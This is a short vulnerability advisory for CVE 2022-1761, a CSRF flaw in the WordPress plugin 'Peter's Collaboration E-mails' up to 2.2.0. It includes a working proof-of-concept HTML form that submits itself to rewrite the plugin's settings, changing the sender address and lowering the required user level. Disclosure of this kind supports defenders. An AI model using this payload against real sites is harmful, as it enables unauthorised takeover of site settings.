Peter’s Collaboration E-mails <= 2.2.0 – Arbitrary Settings Update via CSRF | CVE 2022-1761

Description

The plugin is vulnerable to CSRF due to missing nonce checks. This allows the change of its settings, which can be used to lower the required user level, change texts, the used email address and more.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="text" name="pce_blogname" value="hacked">
    <input type="text" name="pce_fromaddress" value="hacked@example.com">
    <input type="text" name="pce_fromname" value="hacked">
    <input type="text" name="pce_whoapproved" value="1">
    <input type="text" name="pce_contributor_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="administrator">
    <input type="text" name="pce_moderator_roles[]" value="author">
    <input type="text" name="pce_moderator_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="editor">
    <input type="text" name="pce_moderator_roles[]" value="subscriber">
    <input type="text" name="pce_emails_to_send[]" value="pending">
    <input type="text" name="pce_emails_to_send[]" value="approved">
    <input type="text" name="pce_emails_to_send[]" value="future">
    <input type="text" name="pce_emails_to_send[]" value="backtodraft">
    <input type="text" name="pce_emails_to_send[]" value="wentlive">
    <input type="text" name="pce_emails_to_send[]" value="private_to_published">
    <input type="text" name="pce_emails_to_send[]" value="edited">
    <input type="text" name="pce_required_capability" value="level_0">
    <input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    document.getElementById("test").submit();
</script>